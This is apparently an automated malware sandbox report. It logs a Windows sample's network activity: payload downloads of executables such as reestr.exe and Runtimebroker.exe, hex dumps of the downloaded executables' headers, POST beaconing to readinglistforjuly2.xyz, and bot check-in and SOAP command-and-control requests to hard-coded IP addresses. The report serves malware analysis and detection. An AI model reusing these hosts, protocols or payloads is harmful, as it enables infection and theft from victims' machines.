Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49998

Source: C:\Users\user\AppData\Local\Temp\9675.exe

Code function: 21_2_00404CE0 GetModuleFileNameW,SHGetFolderPathW,DeleteUrlCacheEntryW,URLOpenBlockingStreamW,URLOpenBlockingStreamW,DeleteUrlCacheEntryW,URLDownloadToFileW,ShellExecuteW,

21_2_00404CE0

Source: global traffic	TCP traffic: 192.168.2.3:49735 -> 185.191.34.170:8888
Source: global traffic	TCP traffic: 192.168.2.3:49924 -> 193.56.146.22:47861

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Aug 2021 07:23:48 GMTContent-Type: application/x-msdos-programContent-Length: 24576Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Thu, 12 Aug 2021 20:15:51 GMTETag: "6000-5c96266c116f0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 4b c4 db 9d 2a aa 88 9d 2a aa 88 9d 2a aa 88 1e 36 a4 88 9c 2a aa 88 f4 35 a3 88 9f 2a aa 88 74 35 a7 88 9c 2a aa 88 52 69 63 68 9d 2a aa 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee fd 3a 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 00 00 00 20 00 00 00 00 00 00 78 12 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 16 00 0b 00 04 00 00 00 00 00 00 00 00 60 00 00 00 10 00 00 83 62 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 2e 00 00 28 00 00 00 00 50 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 22 00 00 00 10 00 00 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 84 03 00 00 00 40 00 00 00 10 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 0a 00 00 00 50 00 00 00 10 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 13 Aug 2021 14:19:43 GMTAccept-Ranges: bytesETag: "947f31434e90d71:0"Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 13 Aug 2021 14:23:47 GMTContent-Length: 288256Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 86 54 c4 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d0 02 00 00 2a 85 02 00 00 00 00 07 1c 00 00 00 10 00 00 00 e0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 87 02 00 04 00 00 e8 9f 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 16 03 00 4e 00 00 00 14 0c 03 00 3c 00 00 00 00 a0 86 02 10 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e2 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 f8 02 00 18 00 00 00 88 f8 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 02 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 cf 02 00 00 10 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 be 36 00 00 00 e0 02 00 00 38 00 00 00 d4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 7c 83 02 00 20 03 00 00 42 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 16 01 00 00 a0 86 02 00 18 01 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Aug 2021 07:24:18 GMTContent-Type: application/x-msdos-programContent-Length: 472576Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Fri, 13 Aug 2021 07:24:02 GMTETag: "73600-5c96bbc5d1c67"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 7d 13 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a0 05 00 00 2a 85 02 00 00 00 00 07 1c 00 00 00 10 00 00 00 b0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 8a 02 00 04 00 00 a7 ba 07 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 05 00 4d 00 00 00 14 dc 05 00 3c 00 00 00 00 70 89 02 10 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b2 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c8 05 00 18 00 00 00 88 c8 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 05 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 9e 05 00 00 10 00 00 00 a0 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bd 36 00 00 00 b0 05 00 00 38 00 00 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 7c 83 02 00 f0 05 00 00 42 00 00 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 16 01 00 00 70 89 02 00 18 01 00 00 1e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 193.56.146.22:47861Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 193.56.146.22:47861Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 193.56.146.22:47861Content-Length: 14461Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 193.56.146.22:47861Content-Length: 1468Expect: 100-continueAccept-Encoding: gzip, deflate

Source: Joe Sandbox View	IP Address: 91.241.19.52 91.241.19.52
Source: Joe Sandbox View	IP Address: 91.241.19.52 91.241.19.52

Source: Joe Sandbox View	ASN Name: REDBYTES-ASRU REDBYTES-ASRU
Source: Joe Sandbox View	ASN Name: LVLT-10753US LVLT-10753US

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: GET /reestr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: GET /Runtimebroker.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.241.19.52
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: GET /bots/knock?worker=Universal&os=Windows&version=3.13 HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /bots/chkVersion?currVers=3.13&arch=win HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
